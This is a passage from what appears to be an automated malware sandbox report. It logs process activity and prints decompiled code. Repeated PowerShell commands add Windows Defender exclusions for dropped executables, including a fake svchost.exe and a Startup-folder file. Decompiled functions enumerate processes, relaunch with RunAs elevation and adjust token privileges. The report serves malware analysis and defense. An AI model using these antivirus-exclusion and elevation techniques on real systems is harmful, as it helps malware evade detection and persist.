                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 1260 Parent PID: 5168

                                                                                                      General

                                                                                                      Start time:16:13:02
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 5936 Parent PID: 6432

                                                                                                      General

                                                                                                      Start time:16:13:04
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6188 Parent PID: 6088

                                                                                                      General

                                                                                                      Start time:16:13:04
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 3976 Parent PID: 6536

                                                                                                      General

                                                                                                      Start time:16:13:04
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 7152 Parent PID: 6640

                                                                                                      General

                                                                                                      Start time:16:13:05
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 4488 Parent PID: 1260

                                                                                                      General

                                                                                                      Start time:16:13:05
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 1264 Parent PID: 5168

                                                                                                      General

                                                                                                      Start time:16:13:06
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 3532 Parent PID: 6188

                                                                                                      General

                                                                                                      Start time:16:13:07
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 3676 Parent PID: 3976

                                                                                                      General

                                                                                                      Start time:16:13:07
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 5736 Parent PID: 6088

                                                                                                      General

                                                                                                      Start time:16:13:07
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 6344 Parent PID: 1264

                                                                                                      General

                                                                                                      Start time:16:13:09
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 4144 Parent PID: 5168

                                                                                                      General

                                                                                                      Start time:16:13:09
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 2812 Parent PID: 5736

                                                                                                      General

                                                                                                      Start time:16:13:10
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 2456 Parent PID: 6088

                                                                                                      General

                                                                                                      Start time:16:13:11
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 1488 Parent PID: 4144

                                                                                                      General

                                                                                                      Start time:16:13:15
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6148 Parent PID: 5168

                                                                                                      General

                                                                                                      Start time:16:13:16
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 4856 Parent PID: 2456

                                                                                                      General

                                                                                                      Start time:16:13:16
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 6760 Parent PID: 6088

                                                                                                      General

                                                                                                      Start time:16:13:16
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: powershell.exe PID: 3084 Parent PID: 5168

                                                                                                      General

                                                                                                      Start time:16:13:18
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                                                                                                      Imagebase:
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 4864 Parent PID: 6148

                                                                                                      General

                                                                                                      Start time:16:13:18
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: conhost.exe PID: 5000 Parent PID: 6760

                                                                                                      General

                                                                                                      Start time:16:13:18
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:
                                                                                                      Imagebase:
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >

                                                                                                        Analysis Process: AdvancedRun.exe PID: 6924 Parent PID: 6396 AdvancedRun.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                                                        0x00409609
                                                                                                        0x0040960f
                                                                                                        0x00409619
                                                                                                        0x00409623
                                                                                                        0x0040962e
                                                                                                        0x00409633
                                                                                                        0x00409640
                                                                                                        0x0040964a
                                                                                                        0x00409782
                                                                                                        0x0040965a
                                                                                                        0x0040965f
                                                                                                        0x00409678
                                                                                                        0x0040967e
                                                                                                        0x00409681
                                                                                                        0x00409685
                                                                                                        0x00409688
                                                                                                        0x004096b2
                                                                                                        0x004096bf
                                                                                                        0x004096c6
                                                                                                        0x004096cb
                                                                                                        0x004096da
                                                                                                        0x004096e6
                                                                                                        0x0040973b
                                                                                                        0x00409747
                                                                                                        0x0040975f
                                                                                                        0x00409764
                                                                                                        0x0040976a
                                                                                                        0x00409770
                                                                                                        0x00409773
                                                                                                        0x0040977d
                                                                                                        0x00000000
                                                                                                        0x0040977d
                                                                                                        0x004096ee
                                                                                                        0x004096f5
                                                                                                        0x004096fc
                                                                                                        0x00409704
                                                                                                        0x0040970c
                                                                                                        0x0040971c
                                                                                                        0x0040971c
                                                                                                        0x00409704
                                                                                                        0x00409721
                                                                                                        0x00409728
                                                                                                        0x00409739
                                                                                                        0x00409739
                                                                                                        0x00000000
                                                                                                        0x00409728
                                                                                                        0x00409693
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004096a5
                                                                                                        0x004096a9
                                                                                                        0x004096ac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004096ac
                                                                                                        0x004097a6

                                                                                                        APIs
                                                                                                          • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                        • memset.MSVCRT ref: 0040962E
                                                                                                        • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                        • memset.MSVCRT ref: 004096C6
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                        • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                        • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                        • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                        • API String ID: 239888749-1740548384
                                                                                                        • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                        • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                        • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                        • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                                                        0x00401c31
                                                                                                        0x00401c33
                                                                                                        0x00401c48
                                                                                                        0x00401c4f
                                                                                                        0x00401c61
                                                                                                        0x00401c68
                                                                                                        0x00401c74
                                                                                                        0x00401c79
                                                                                                        0x00401c7a
                                                                                                        0x00401c7b
                                                                                                        0x00401c84
                                                                                                        0x00401c89
                                                                                                        0x00401c8e
                                                                                                        0x00401c8f
                                                                                                        0x00401c9b
                                                                                                        0x00401ca6
                                                                                                        0x00401caf
                                                                                                        0x00401cb9
                                                                                                        0x00401cc0
                                                                                                        0x00401cc7
                                                                                                        0x00401cce
                                                                                                        0x00401cd5
                                                                                                        0x00401cdd
                                                                                                        0x00401ce0
                                                                                                        0x00401d14
                                                                                                        0x00401ce2
                                                                                                        0x00401ce8
                                                                                                        0x00401cf3
                                                                                                        0x00401cf6
                                                                                                        0x00401cfe
                                                                                                        0x00401d09
                                                                                                        0x00401d09
                                                                                                        0x00401cfe
                                                                                                        0x00401d1b

                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                        • memset.MSVCRT ref: 00401C4F
                                                                                                        • memset.MSVCRT ref: 00401C68
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                        • memset.MSVCRT ref: 00401C9B
                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                        • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                        • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                        • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                        • API String ID: 903100921-3385179869
                                                                                                        • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                        • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                        • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                        • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                        0x00408fc9
                                                                                                        0x00408fd0
                                                                                                        0x00408fe8
                                                                                                        0x00000000
                                                                                                        0x00408fea
                                                                                                        0x00408ff4
                                                                                                        0x00409001
                                                                                                        0x00409003
                                                                                                        0x0040900c
                                                                                                        0x0040900e
                                                                                                        0x00409010
                                                                                                        0x0040901a
                                                                                                        0x0040901a
                                                                                                        0x00409010
                                                                                                        0x0040901f
                                                                                                        0x00409026
                                                                                                        0x0040902d
                                                                                                        0x00409030
                                                                                                        0x00409035
                                                                                                        0x00409037
                                                                                                        0x00409040
                                                                                                        0x00409042
                                                                                                        0x00409044
                                                                                                        0x00409051
                                                                                                        0x00409051
                                                                                                        0x00409044
                                                                                                        0x00409053
                                                                                                        0x0040905e
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                          • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                        • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                        • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
